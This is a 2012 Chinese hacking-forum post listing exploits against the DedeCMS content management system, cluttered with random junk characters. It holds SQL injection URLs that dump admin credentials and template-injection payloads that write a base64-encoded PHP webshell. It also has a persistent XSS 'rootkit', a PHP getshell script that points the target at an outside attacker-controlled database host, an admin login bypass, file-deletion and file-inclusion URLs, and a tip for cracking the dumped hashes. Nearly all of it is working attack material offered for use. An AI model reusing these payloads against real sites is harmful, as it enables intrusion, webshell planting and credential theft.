找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3184|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
! ]/ `' {$ Y3 A4 z% D+ D
Dedecms 5.6 rss注入漏洞
- I! q6 x) G9 t0 w% P
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1) b# @" g  ^& d8 o# @3 O
6 K. [! s; \) Y5 x* \3 g
; K8 C8 O* E7 \

: }$ F' _) C# _9 d; a7 V5 h+ Q- o. i% E/ \

6 J6 @1 B6 M4 P$ L0 \2 A0 |0 P: O% [! G$ ^5 d- }$ y

3 b# Z! L& j6 m) ]9 y& U2 R  I1 d: B! B) R  z6 P( t
DedeCms v5.6 嵌入恶意代码执行漏洞( l  E7 \  z7 \, S5 {3 s( ]
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
7 P: x) R1 g5 ?$ \" \5 d发表后查看或修改即可执行# W7 B: }7 t0 c3 D
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}+ f% y2 f0 s9 j. L$ h6 V
生成x.php 密码xiao,直接生成一句话。/ e% {5 R; m- a. @; F) L

2 @: Z& S  I: e' [$ G' R) \
: g% |# t: a) z1 j% y$ H8 J. e! a( r) v) X# K
. R" x  ?9 T- |8 `( r

% F9 a# X2 b  ~; D9 L: A1 i/ {1 z1 ]: O! ]# d  O2 D/ l& n

% y( f. q4 i: N. l" _9 o# A: O2 c  _& e7 Z: c  C- A$ }- Z3 t* g: m
Dede 5.6 GBK SQL注入漏洞) Y. v' G- q8 S
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';% G  g) m" M3 q& ]# p
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe) a0 s. }3 p! d. B: t% u+ g- C. S
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
$ R+ _5 _6 V& U
- R% _0 T' n+ I7 ?& [9 e% R, m
$ l2 H: d* [  v8 [# {% {, L
% V3 n4 k, V# s5 g0 E8 s& F
. l# o6 d. p7 b* p" l
) \, E; ^4 l0 m5 Q5 n: O  u
9 n! n+ Z" r. P! _
) E, A. o& ^5 j, A+ T* r! N. h9 i1 _
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞. z! {9 E4 e* ]# E4 ^+ v) P1 c! e
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 3 h4 A# X7 B. M' p' B3 [; i
' K* g3 o9 H* Z% Q

1 n% M* d# X3 G; ~5 @2 t- A5 s) }2 H. D9 W% f
8 S+ ]3 z( X, a8 E) c% r. k2 ^, o
; P3 `" f0 @7 E

5 R1 y! ?! A  z7 ], o3 WDEDECMS 全版本 gotopage变量XSS漏洞4 a7 ^! k6 u3 @- t3 {% s
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 , y: ?5 y! \) @: m6 ?
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
( S" t6 b) \; Y  A0 [) l5 n
- R  H3 V$ P/ i' _, c; P* Q2 f$ s6 e
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
+ \; w# N$ r" ^0 c, K3 d
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda  U, E( }5 [1 K7 C: z* x7 U3 C
( Z+ {% U" C. g% G$ d  r

1 o! B6 H1 h6 W" ^6 U" O' {http://v57.demo.dedecms.com/dede/login.php0 |6 ^% L- q/ u% f+ a

  k" \, Z! ~: S6 V+ w# w7 p) K0 K9 w) R# e. `5 k
color=Red]DeDeCMS(织梦)变量覆盖getshell6 v2 c" b7 n& o  T3 w9 x
#!usr/bin/php -w
/ O2 c) R0 c" _! k6 e$ r<?php
6 Y3 C' M3 W& k8 ]error_reporting(E_ERROR);
+ ]- ~& y- I6 I/ d- Y! wset_time_limit(0);* Q/ P& Q% W& q
print_r('
& Z+ c7 w: D: H6 ^: c& mDEDEcms Variable Coverage
; Q0 f& t  s) {2 f' I9 }; j5 _5 oExploit Author:
www.heixiaozi.comwww.webvul.com
6 C7 y; \" f% ]1 W);
/ W, K  ~, P  Z1 e# k* a8 }echo "\r\n";, Y- C; [' J7 L* R0 t0 a
if($argv[2]==null){
7 X/ \* g: Z; L1 m5 L  }9 vprint_r('
- _, I; l4 ?/ [9 O, p1 @+---------------------------------------------------------------------------+2 o; i' n8 x. c/ q2 U
Usage: php '.$argv[0].' url aid path5 h3 `. ]  Q6 f. ?4 _0 b0 e/ Q- V
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
5 R+ D5 L1 f; v. u  pExample:
! k  L" B: [& R. D9 s3 aphp '.$argv[0].'
www.site.com 1 old9 i; L5 A: n/ h' Y# `
+---------------------------------------------------------------------------+
+ V& r7 i: [" O% ?9 O+ w');
& h3 w" O+ `* L' ~, o" a* kexit;
; ^! I+ Z6 C6 M4 i1 X' \}' d1 c9 a, f$ l: _  `$ C( l4 X8 K- `- N
$url=$argv[1];
& c4 ?! q% r/ l& J( I$ V: d, a$aid=$argv[2];
- h2 c8 K! H  u/ H* Q2 V9 B2 {& x$path=$argv[3];
# g! C4 z8 p, Q8 G$exp=Getshell($url,$aid,$path);
6 W* N; M" j% p- y% T! F6 h$ j0 qif (strpos($exp,"OK")>12){9 w/ L& \& @: R& J9 [
echo "
% y( B  g# w, ~0 l; rExploit Success \n";6 K' D3 y4 ~# r
if($aid==1)echo "$ e4 L* f1 T1 W8 o! Z/ x
Shell:".$url."/$path/data/cache/fuck.php\n" ;+ W) H; m. N6 c4 f
/ f; b# u6 h6 d, Y

% \. P* h) O# w( K5 r5 jif($aid==2)echo "
4 G4 Y1 W9 R- UShell:".$url."/$path/fuck.php\n" ;0 L; e* E: K2 s; |
% F3 r6 B8 M' x- L% i3 Q6 M: N* d
/ }. h7 y' W* K5 Q1 m+ P( J/ D
if($aid==3)echo "
+ ]: ?3 J0 X( L5 f( zShell:".$url."/$path/plus/fuck.php\n";* r! f" g8 g. D+ K4 M2 F" @) z8 k
) [0 I4 h! D0 h: Q- i/ n- @

4 B  S$ L4 ?) o3 Q9 X3 e}else{
/ M  W" b0 L- B/ Aecho "  ^# m. U. R! W! R5 H( C
Exploit Failed \n";
& V( L6 |& Q  q* }# F}" \4 n5 W1 w; N; _# G- t
function Getshell($url,$aid,$path){
1 O  V3 {6 x, e/ d3 w1 p! B) T$id=$aid;
2 m0 }  j4 p+ G. O$host=$url;' e6 G. }6 h2 l. X4 O+ N, Z7 A; C
$port="80";0 t$ l) a- ~2 L
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";# U* a  z) g( |4 f
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
. k$ |+ r8 n4 i* I* N8 w+ U: N# ^$data .= "Host: ".$host."\r\n";
, [8 h; c" z# I" _$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
5 @- R9 X/ v" f  R9 ]$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";6 {( n' G. i' n  B! K
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
+ K9 O  m7 V  T8 w+ o, _//$data .= "Accept-Encoding: gzip,deflate\r\n";' M+ P7 x: j/ [3 f1 L0 e' e
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
6 U2 U/ @1 T  n0 T( l$data .= "Connection: keep-alive\r\n";
8 s+ o% Z9 U0 F, z7 q) L" W) b$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
1 E& h2 y, J) X3 E6 D2 B& ]$data .= "Content-Length: ".strlen($content)."\r\n\r\n";  g- f: F3 `! {* Y! D. H
$data .= $content."\r\n";. {' w8 G4 a+ Y# B
$ock=fsockopen($host,$port);' ~& f! H3 @% ]5 W1 f/ t# ]) h
if (!$ock) {. a0 p+ s- D! w$ |
echo "
3 a; O0 ?3 f+ _8 P- R+ j( aNo response from ".$host."\n";, N+ T2 P  H" F0 E
}
' W% N( S$ Z% a! s5 Cfwrite($ock,$data);
& n1 |. y& h  m- h( c# Ewhile (!feof($ock)) {
" I+ {- x  O" `& ^- M$exp=fgets($ock, 1024);3 Q( S9 Q+ w% V4 F3 v- P3 h
return $exp;; k. G" R/ i- P9 }, b
}
- g- f$ d8 Q4 }! \- G}
3 y; X$ e' Q; K) H, u5 D2 @3 A
" w7 [' v  G( T( ~
1 O: A) f/ K8 O0 V! u1 k! f?>% c' `5 h$ G- W- o' ]

4 A+ C+ N  g! |- j& ?5 ?" R; V' H7 v7 E( `
, Q9 ~3 ^4 U% a' y. Y  d; Z+ M# h

2 N  y7 L0 n; X  o' v( T0 M
( |  f! [- |+ g" L3 o5 G; U% Y
1 M) j; q# _8 v- W3 Z% A1 [% h$ `7 p7 c  P) ^$ B$ Q0 j! r+ f3 D
/ h. t4 j3 r! `; D
( B+ @8 s! F1 @" ^+ p2 W
/ y4 E/ D+ R" g  h$ D2 J/ c$ ^, d. k
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
! d1 t" X2 }) ]" Q( ^1 M
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
& [: X, k, n' V2 q9 z- D) F/ C1 C2 r
' T5 U9 h& D5 V8 n  H# a6 r# u  b: I; r7 k: b0 f( ?
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
0 a- N2 B3 I5 J2 G# k+ Q; h, w* l: z  S& f# v  E) Z
  Q  v, c1 c+ ]3 S
此漏洞的前提是必须得到后台路径才能实现
9 a+ R( F) ], |
. }6 ^- _) V( D' C% F
" z  u* [& z: S. n2 |
* C; b+ ?( w& ?  O+ I0 h( G3 o5 m) d  @6 b
/ W) w9 C/ Q% ~' L
+ p/ W: m3 `4 G4 j0 `, ?

& s8 T) |. Z+ l. s
9 D* f% F1 s+ w8 L  [/ s. f) U! Y5 E# I, A% `0 v7 N1 w

- L7 o0 j3 Q, A$ K0 ~Dedecms织梦 标签远程文件写入漏洞
1 c' E) L! {9 x前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
3 m! k  E/ N: H# r- J2 _& P3 `1 \3 M1 x
/ f1 x0 i: i" f3 p
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 % u) y2 K% s7 A  D" X4 F$ \% q2 |: p7 L
<form action="" method="post" name="QuickSearch" id="QuickSearch">6 K3 g. D, c. l
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
3 V' Y: h* j  g1 c<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />: P( ~4 l8 Z6 ~# a' z/ c" r
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
/ \4 D5 i% s1 ^& F) P/ r4 s<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />5 e5 Y- `# ?2 r. c" t- u8 i
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />5 g! m. O+ Z8 ?8 J9 Y) U
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br /># I8 g+ U' L2 q+ S+ M+ ]0 k
<input type="text" value="true" name="nocache" style="width:400">
1 A1 V( A' t. e- I* Y9 C<input type="submit" value="提交" name="QuickSearchBtn"><br />
. v% Q$ A0 e$ Q" l8 J6 z" [  _</form>
$ V2 }2 F2 C$ J<script>  |2 {9 w$ U& V* \$ k2 @
function addaction()! |, ]' o$ D* n- H7 N8 E% h3 \
{0 A1 b3 C' A3 L% z$ k2 ^
document.QuickSearch.action=document.QuickSearch.doaction.value;( C7 ]& g1 B* j' {
}& c; ?. v& `0 o' H. l, O9 H  ~
</script>
1 g* F: q, b5 q5 @+ |
+ ~  V! X9 p3 z  ]6 v0 O8 i. T9 U: F  X: K# ^9 k$ s) z4 i

- W6 B8 U- @8 K. }# W) Q$ Y8 L" ~3 r% c3 ?$ E" \, ^4 \1 a! o

" b, A2 O$ i2 l( @
, R$ S6 w7 L* \7 V, S) ?+ |8 B. O7 x% e7 R3 _* E- M
/ k& d' L3 F- x* a

8 G# o  Y* j5 v! P, E' ^
0 W- M, e5 t1 ]8 S# r% A, mDedeCms v5.6 嵌入恶意代码执行漏洞
  V5 @- \& Z7 o8 v9 k, \$ h; P/ `注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
3 P7 v! I; X" a" p  ^  va{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
5 U) T; J6 k& z; P' Y; v7 F6 `生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
* A  n- D- I4 G' \& mDedecms <= V5.6 Final模板执行漏洞
' _3 Z) t# j, a注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
; t! g& B8 z3 Q; V0 wuploads/userup/2/12OMX04-15A.jpg9 S$ X5 _( o: v# a, b
2 K4 a6 b, _, C! D  x2 C
2 f, ?2 c. {1 J- q' v1 N& P& j
模板内容是(如果限制图片格式,加gif89a):
. F. p$ g  e; m6 j9 Y. T{dede:name runphp='yes'}) W, w/ l( f# l
$fp = @fopen("1.php", 'a');
+ l; F5 `9 Y7 d@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");, f9 _0 ]# K2 H1 q; P0 U
@fclose($fp);+ f+ `$ P' P4 L- ?7 C- P2 _
{/dede:name}
: w( H: \1 M$ u3 d" {2 修改刚刚发表的文章,查看源文件,构造一个表单:
- M2 G7 t) \: r! g* k# O<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">4 S. A3 j5 g% z! o8 A
<input type="hidden" name="dopost" value="save" />
( n/ `# {( m1 ?<input type="hidden" name="aid" value="2" />
* j: x. h  G! }' x9 \2 c! [<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />3 E  k  o9 `. U, C. v1 b& A. J
<input type="hidden" name="channelid" value="1" />
* c+ ]  X  P/ o; \<input type="hidden" name="oldlitpic" value="" />8 i* e: G2 P2 }: P
<input type="hidden" name="sortrank" value="1275972263" />% u- A( e3 {/ L' w6 a8 x1 A
) L8 }) F5 C2 r3 R  R$ F5 `* c( d; y

  r$ F$ q2 u' c<div id="mainCp">  M* k7 V1 ]1 ?/ w0 Q4 m' i) L
<h3 class="meTitle"><strong>修改文章</strong></h3>
% p# h# y6 J# Y2 Z
/ a- y/ A+ w& E! Y5 S6 ?8 \( ~# C  A/ X9 n4 x
<div class="postForm">7 v1 ?1 B2 ?1 H! M  K
<label>标题:</label>9 j1 c' [1 @& ]
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
5 o! f/ ^4 M# A* B  h( P
; @9 n# a) L, O  [- \
# G4 L" G* Z9 m4 x* |, L<label>标签TAG:</label>
5 S, u( {& Y$ d9 @<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
8 l8 B; ]! k; u  j, c3 y) T5 U# u' I% k& Y/ N1 J) E

6 H6 C& Z1 b6 A+ o<label>作者:</label>- G- P8 H) s% e' n# x
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
; d9 O2 J3 U: o$ U0 J
6 \! y( |$ D$ K* O9 J0 M2 Y- u+ }' b  S, v
<label>隶属栏目:</label>
3 i4 y7 W; A; `) |<select name='typeid' size='1'>
* ?9 r2 o/ H2 z<option value='1' class='option3' selected=''>测试栏目</option>1 {8 w2 e. O' c; ]3 C+ k8 {' _
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)7 ~& G0 T1 o! \! x$ B! K5 q- `
2 w4 n! p8 w; ]- f+ _7 U
5 X: @3 J; q- \& h) M* ]) L% t
<label>我的分类:</label># y2 W/ y$ }! ?& K$ K5 u
<select name='mtypesid' size='1'>8 g: Z/ n; _. n" n- P5 r. q
<option value='0' selected>请选择分类...</option>3 X( p. S4 L# {+ _: o
<option value='1' class='option3' selected>hahahha</option>
8 i% E; X: y* N3 o</select>
6 _- x# v) s8 g" K4 k
! B9 z6 R& [% m  Q0 E+ _- P: n$ _1 y6 l0 {" }  ?' ~, C
<label>信息摘要:</label>7 x, r$ ]9 X) v; m/ p7 y) S
<textarea name="description" id="description">1111111</textarea>" u/ F% B5 f) R: z8 j1 M5 X
(内容的简要说明)
+ f2 z6 l! W. k6 R/ D* E
/ H4 i4 n6 Z% G. V  i/ [
% o, y4 k5 i( s! E- T<label>缩略图:</label>8 ^3 H9 B, V2 i& J0 G; {
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>2 W7 p+ k4 G" e+ G9 z
1 k# {! ~+ `& V+ Y' `6 h# B. n
  O$ j, I. {% B* W* A7 i) n/ r; p
<input type='text' name='templet'
+ ~" m, v  n* S/ H0 ~4 Yvalue="../ uploads/userup/2/12OMX04-15A.jpg">
0 N6 I& Z  n$ Z$ o9 H5 H3 s+ O<input type='text' name='dede_addonfields'
& ]$ q- C, g+ T) Z& f! t1 C0 hvalue="templet,htmltext;">(这里构造)6 k1 A# r2 D  A" e
</div>3 I& b  S; w0 {1 P+ l  D

# L4 C2 q+ C$ U2 A5 j
8 \# I1 w* m5 g0 V* j; W* V<!-- 表单操作区域 -->) e0 f: J1 b7 q, D
<h3 class="meTitle">详细内容</h3>
' v) G2 }0 i1 K) s) ?
' q1 N# o0 N+ ?# M, h' b$ v& D
<div class="contentShow postForm">, Z0 P. _9 D3 X$ J) H/ ^) H
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
- V. ?7 V8 e9 S7 C* V$ r
: [1 ^. U8 ~6 H6 U
8 r* Q7 a: @9 ?: y<label>验证码:</label>
) e- R0 \! L- ^4 v" ^) a<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />" u, G" P( D0 z# A
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
+ w0 t, l& ], r
# T/ R3 ~# T9 M: V; l. f2 Z9 j" l& l2 F6 L/ F5 k
<button class="button2" type="submit">提交</button>
+ v0 c( M% h# ?$ s<button class="button2 ml10" type="reset">重置</button>
6 \& W. x6 R, Q9 x' F* B</div>
* _- |, a6 q4 ~- y. @3 n
) X) A/ M5 Q# T. u3 f5 I! |
5 [. L+ ^3 _" Q, Q) r! K</div>3 a3 Y: V% Q  ~  `2 `
: L- F, y7 z( q+ ]4 g& X" ^4 W

: b! H6 \7 ]7 k# M" u$ e</form>6 Y: h* s( Q/ N( O1 Y

' I6 P+ c& Y$ `* W
9 s0 S3 s* l! ]# A提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
2 e( J  c) u9 W5 n8 A0 Z假设刚刚修改的文章的aid为2,则我们只需要访问:7 Y2 U" j* i' D% i* f
http://127.0.0.1/dede/plus/view.php?aid=2
, F4 g' {: w( S即可以在plus目录下生成webshell:1.php' t# m8 Y& i9 G" x, S' A: g
$ q- q: K" y; a; [; R2 U+ w# o$ A

9 I  o1 Y' |% X: q. E: G3 ^0 J+ p2 n! V) v0 e# t

$ }8 F( V# f) d2 Y; t5 @. q
: b. S: t: ?2 a1 o1 v9 N- I" F+ E& j! }' Z% t9 z5 W
) R3 B1 _" [  q) F1 {! q2 n

8 n  W* O; x# z1 a
( X# w! U# ~2 u2 S! [8 w5 f1 Z+ O( Z4 }
. P6 Z1 \2 w- t4 K: I% f8 [( s$ T

! `4 ~& W' w7 e) e- W+ N# w  I: fDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
& c4 V9 z& ^/ k5 }1 c  S, uGif89a{dede:field name='toby57' runphp='yes'}7 {: L2 o, @/ L  w2 `
phpinfo();% C+ ?. u/ i% ^" x* G9 A
{/dede:field}" A* |+ A/ U& o
保存为1.gif
3 U9 O$ {1 Z, S* G% |! V- R* s<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> . N2 l7 H# q* O7 ~
<input type="hidden" name="aid" value="7" /> / j. F& t; `: N* i5 Y1 T( c
<input type="hidden" name="mediatype" value="1" /> & K0 v6 h0 c: F/ D  W% ?2 R
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
) V) n/ X# p1 G/ I' k6 o<input type="hidden" name="dopost" value="save" />   x5 N2 N1 D6 O- M1 s& l
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> % n' n' v7 U" s& F, I2 A
<input name="addonfile" type="file" id="addonfile"/> - Y& P9 y* y/ o: Q- \& H% C$ t
<button class="button2" type="submit" >更改</button>
5 J4 v  C- o" M% w+ M, ^$ V</form>
- R+ O' w! t) x9 s' h: s8 [& w  c
  [) u; `' z7 e" e( T( R
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif6 u6 ~* d) P+ e+ }; ]! _, b- m* h
发表文章,然后构造修改表单如下:
! p4 q! s2 Q3 D1 g$ p4 ^0 c
8 ?) A! s( ]. l5 x# U
0 [; X# Y3 E/ l5 n<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> ; f# A3 [; T6 v
<input type="hidden" name="dopost" value="save" />
) O5 O: h+ j" t  c. E+ U; {) T<input type="hidden" name="aid" value="2" /> 8 f& L" _) ]8 l& a( b: y5 G% M3 K
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
$ k* Y, ~: ?. g<input type="hidden" name="channelid" value="1" /> # w% b' m- f( y4 h# K
<input type="hidden" name="oldlitpic" value="" />
0 E. {9 h& q3 R  t<input type="hidden" name="sortrank" value="1282049150" />
2 S/ v3 P/ h" U3 C; j, H( u<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
5 n) }- D4 }- E3 t* g<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> & ?1 j# K! _8 O- H4 I/ o' ]8 ^" k% e9 W
<select name='typeid' size='1'> 9 u( u; e0 D2 P7 ^, e4 _, t* T
<option value='1' class='option3' selected=''>Test</option> ! C9 K; M( Y9 G
<select name='mtypesid' size='1'>
1 O; c* O5 n1 i; B<option value='0' selected>请选择分类...</option>
3 p+ C2 {, j/ D. p) o3 A, d/ i<option value='1' class='option3' selected>aa</option></select> 5 P2 X* }( c7 J  n
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 3 K" G+ ?9 [4 j6 G2 i- Y
<input type='hidden' name='dede_addonfields' value="templet">
5 ]5 d1 d8 J1 l; A3 o<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
5 i2 M! }3 H. c) n$ ^" G' _<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> : e0 A. c$ _- S% ?" S. }
<button class="button2" type="submit">提交</button>
8 Y% o$ _7 Y5 i8 ]. h! x5 Y$ \</form>
( G, V$ E4 u: ~
% m" y; m, D% ]% S) U1 }! @5 ~: P  e1 ], P

  c/ @6 X% P, ~# G8 P6 y
$ w: ^$ @( z6 |, x( h
3 ?" _7 c( t9 i) _% u' p+ N& h) P# }/ S  Z
. N/ e" {+ O( P! s. ]0 H5 u

$ R: l3 c: x7 a* h: v- j8 `& x& h( I- C& ]9 w1 `

) a$ _( Y' B: y' }6 o0 ^* g- [. ^# P7 {2 H/ m

# j  M% Z& \( H% K  T6 Y织梦(Dedecms)V5.6 远程文件删除漏洞
" x3 T2 ^& g( D$ A5 P3 d0 u6 a
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif8 {' J% u: c5 X5 `& X2 J6 q

; j) P) D' v8 g; P) `9 G( [8 b, ?$ e) W+ U

/ D$ f9 \" @8 T) Y
5 F; f' R2 J5 J' y1 D8 e1 c2 Z
/ {2 o3 e/ A5 c: j( l9 g$ W. P4 j7 F1 K% s/ V  r
" H/ r6 _7 o+ b# u

! s* }$ Z. p* A0 {; k5 |) r, V% s! w. C# H+ r9 W( ^) ]( g& f

. E3 t+ b$ p4 z织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 5 Y; ^! ]5 o3 [% F0 K+ G& E
http://www.test.com/plus/carbuya ... urn&code=../../
8 M- r0 t# k9 T) M
7 F. [, q1 r  N9 {, A, ]" N! b: R; B* A* F0 x9 `
# f7 _  Y5 M$ [( P2 u$ R$ |
  Z" U9 t  Q2 Q) @: _0 L/ Z

" k  e. N; c: n! ^. @7 |6 d. L8 L& A2 X5 x+ _

1 t* ~" V. o" M, j# }+ n' |0 F7 R( c5 q2 p3 e& _) J# O& L
$ I5 {4 V  M, e7 w6 s$ u3 ^
! u: M: C  R7 s) s
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 , r0 W; A# B7 x& `. r) w
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
; ]$ o7 s  V8 ]* F5 y- J密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5" T8 t) {  v1 r! G) {1 v; Z

  H/ K& e% H! D3 n+ V1 b* t
$ e- u; L& S4 p; m: b- J
' U$ n- I) h; [3 y/ g" U6 a7 [1 l) z, o! a! R  [0 h
' @5 B) M! K$ y

  O, L* @9 b4 c$ t! y$ L, }
2 ]% M1 _! }6 T: |% I3 F. \" E
2 J. x4 q3 S( n+ ?2 W% {' J( b$ {2 W2 z! M; i- j
1 ^! |: {  a' Q6 w6 C7 W
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
" G$ @( e/ S! W- \http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='8 y; K9 a  C, P% _; _* H

